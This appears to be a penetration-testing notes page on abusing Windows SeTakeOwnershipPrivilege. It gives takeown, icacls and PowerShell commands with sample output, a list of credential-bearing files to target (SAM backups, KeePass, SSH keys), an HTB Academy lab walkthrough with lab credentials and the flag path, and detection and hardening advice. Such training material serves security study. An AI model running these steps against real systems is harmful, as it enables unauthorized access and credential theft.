🏠SeTakeOwnershipPrivilege

🎯 Overview

SeTakeOwnershipPrivilege grants users the ability to take ownership of any "securable object" including NTFS files/folders, registry keys, services, processes, and Active Directory objects. This privilege assigns WRITE_OWNER rights, allowing modification of object security descriptors to change ownership.

🔑 Privilege Fundamentals

SeTakeOwnershipPrivilege Capabilities

File/folder ownership takeover on NTFS systems
Registry key ownership modification
Service ownership changes
Process ownership manipulation
Active Directory object ownership control

Assignment Contexts

# Group Policy location:
Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment
"Take ownership of files or other objects"

Common Assignment Scenarios:

Administrators - assigned by default
Service accounts - backup jobs, VSS snapshots
Specialized roles - often combined with SeBackupPrivilege, SeRestorePrivilege
GPO abuse victims - via SharpGPOAbuse attacks

📊 Privilege Detection & Enablement

Enumeration

# Check current privileges
whoami /priv

# Expected output:
SeTakeOwnershipPrivilege      Take ownership of files or other objects    Disabled

Privilege Activation

Method 1: PowerShell Script

# Import privilege enablement script
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1

# Verify activation
whoami /priv

# Expected result:
SeTakeOwnershipPrivilege      Take ownership of files or other objects    Enabled

Method 2: Manual Token Manipulation

# Use native Windows APIs to enable privilege
# Requires elevated PowerShell context

🎯 Target File Identification

High-Value Targets

System Configuration Files

# Web application configs
c:\inetpub\wwwroot\web.config

# Registry backups
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security

# System event logs
%WINDIR%\system32\config\SecEvent.Evt

# Registry hive backups
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

Credential Files

# Common password files
passwords.*
pass.*
creds.*
credential.*

# Database files
*.kdbx (KeePass databases)
*.db
*.sqlite

# Document files
*.docx, *.xlsx, *.pdf (may contain credentials)

Specialized Files

# Virtual machine files
*.vhd, *.vhdx, *.vmdk

# Certificate files
*.pfx, *.p12

# SSH keys
id_rsa, id_ed25519

# Configuration scripts
*.ps1, *.bat, *.vbs

💻 File Ownership Attack Technique

Step 1: Target Assessment

# Examine target file details
Get-ChildItem -Path 'C:\TakeOwn\flag.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner}}

# Check directory ownership if file owner hidden
cmd /c dir /q 'C:\Department Shares\Private\IT'

Step 2: Ownership Takeover

# Take ownership using takeown utility
takeown /f 'C:\Department Shares\Private\IT\cred.txt'

# Expected output:
SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\htb-student"

Step 3: Ownership Verification

# Confirm ownership change
Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select name,directory,@{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

# Expected result:
Name     Directory                       Owner
----     ---------                       -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\htb-student

Step 4: Access Control Modification

# Test file access first
cat 'C:\Department Shares\Private\IT\cred.txt'
# May still result in: Access to the path is denied

# Grant full permissions using icacls
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

# Expected output:
processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files

Step 5: File Access

# Read file contents
cat 'C:\Department Shares\Private\IT\cred.txt'

# Sample output:
NIX01 admin
root:n1X_p0wer_us3er!

🎯 HTB Academy Lab Solution

Lab Environment

Target: 10.129.43.43 (ACADEMY-WINLPE-SRV01)
Credentials: htb-student:HTB_@cademy_stdnt!
Access Method: RDP
Objective: Leverage SeTakeOwnershipPrivilege over C:\TakeOwn\flag.txt

Detailed Step-by-Step Solution

1. RDP Connection

# Connect via RDP
xfreerdp /v:10.129.43.43 /u:htb-student /p:'HTB_@cademy_stdnt!'

2. Privilege Verification

# Open elevated PowerShell (Run as Administrator)
# Enter htb-student credentials when prompted

PS C:\> whoami /priv

# Locate SeTakeOwnershipPrivilege in output:
SeTakeOwnershipPrivilege      Take ownership of files or other objects    Disabled

3. Privilege Activation

# Download/locate Enable-Privilege.ps1 script
# If not available, use manual method or download from GitHub

# Enable all token privileges
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1

# Verify activation
PS C:\> whoami /priv
# Confirm SeTakeOwnershipPrivilege shows as "Enabled"

4. Target File Analysis

# Examine target file
Get-ChildItem -Path 'C:\TakeOwn\flag.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner}}

# Check directory structure
cmd /c dir /q 'C:\TakeOwn\'

5. File Ownership Takeover

# Take ownership of flag.txt
takeown /f 'C:\TakeOwn\flag.txt'

# Expected success message:
SUCCESS: The file (or folder): "C:\TakeOwn\flag.txt" now owned by user "WINLPE-SRV01\htb-student"

6. Access Control Modification

# Grant full permissions to current user
icacls 'C:\TakeOwn\flag.txt' /grant htb-student:F

# Verify permissions granted:
processed file: C:\TakeOwn\flag.txt
Successfully processed 1 files; Failed processing 0 files

7. Flag Retrieval

# Read flag contents
cat 'C:\TakeOwn\flag.txt'
# OR
Get-Content 'C:\TakeOwn\flag.txt'

# Submit the flag content found in the file

Alternative Methods

Manual ACL Manipulation

# Using Get-Acl/Set-Acl for more granular control
$acl = Get-Acl 'C:\TakeOwn\flag.txt'
$acl.SetOwner([System.Security.Principal.WindowsIdentity]::GetCurrent().User)
Set-Acl -Path 'C:\TakeOwn\flag.txt' -AclObject $acl

Registry Key Takeover

# Take ownership of registry keys (if applicable)
takeown /f "HKLM\SOFTWARE\TargetKey" /r

⚠️ Impact & Considerations

Destructive Nature

# HIGH RISK ACTIVITIES:
- Live web.config file modification
- Critical system file ownership changes  
- Deep directory structure modifications
- Service configuration file changes

Reversion Challenges

# DIFFICULT TO REVERT:
- Nested subdirectory permission changes
- Service account ownership restoration
- Complex ACL structure reconstruction

Client Communication

# BEST PRACTICES:
- Document all ownership changes
- Attempt permission reversion
- Alert client to irreversible changes
- Include modifications in report appendix

🔍 Detection Indicators

File System Events

# Event IDs to monitor:
Event ID 4670 - Object permissions changed
Event ID 4657 - Registry value modified  
Event ID 4663 - Access attempt to object
Event ID 4656 - Handle to object requested

Process Activity

# Suspicious activities:
- takeown.exe execution with critical files
- icacls.exe permission modifications
- Unusual file access patterns
- PowerShell privilege modification scripts

Registry Monitoring

# Registry changes to watch:
HKLM\SYSTEM\CurrentControlSet\Services (service ownership)
HKLM\SOFTWARE (application settings)
HKCU (user-specific changes)

🛡️ Defense Strategies

Privilege Hardening

# Remove SeTakeOwnershipPrivilege from:
- Non-essential service accounts
- Standard user accounts  
- Development accounts in production
- Third-party application accounts

File System Protection

# Implement protections:
- NTFS permissions auditing
- File integrity monitoring (FIM)
- Protected directories with strict ACLs
- Regular permission reviews

Monitoring Implementation

# Deploy monitoring for:
- Ownership change events
- Permission modification alerts
- Critical file access attempts
- Privilege escalation indicators

📋 SeTakeOwnershipPrivilege Exploitation Checklist

Prerequisites

User account with SeTakeOwnershipPrivilege assigned
Elevated shell (Run as Administrator)
Privilege enablement capability (scripts/tools)
Target file identification (high-value assets)

Execution Steps

Verify privilege (whoami /priv)
Enable privilege (Enable-Privilege.ps1 or manual)
Identify target (sensitive files/directories)
Take ownership (takeown /f [target])
Modify ACL (icacls [target] /grant user:F)
Access content (read/copy sensitive data)

Post-Exploitation

Document changes (ownership modifications)
Attempt reversion (restore original permissions)
Extract data (credentials, configurations)
Report modifications (client notification)

File Targets Priority

Web.config files (application credentials)
Registry backups (SAM, SYSTEM, SECURITY)
Password files (*.txt, *.xlsx containing creds)
Database files (KeePass *.kdbx)
Certificate stores (*.pfx files)

💡 Key Takeaways

SeTakeOwnershipPrivilege enables ownership takeover of any securable object
File system attacks are primary use case for privilege escalation
ACL modification required after ownership change for access
Destructive potential requires careful consideration before execution
Service accounts commonly have this privilege for backup operations
GPO abuse can grant privilege to controlled accounts
Detection possible through file system event monitoring

SeTakeOwnershipPrivilege exploitation provides powerful file system access but should be used with extreme caution due to its potentially destructive nature.

PreviousSeDebugPrivilege NextWindows Built-in Groups

Last updated 4 months ago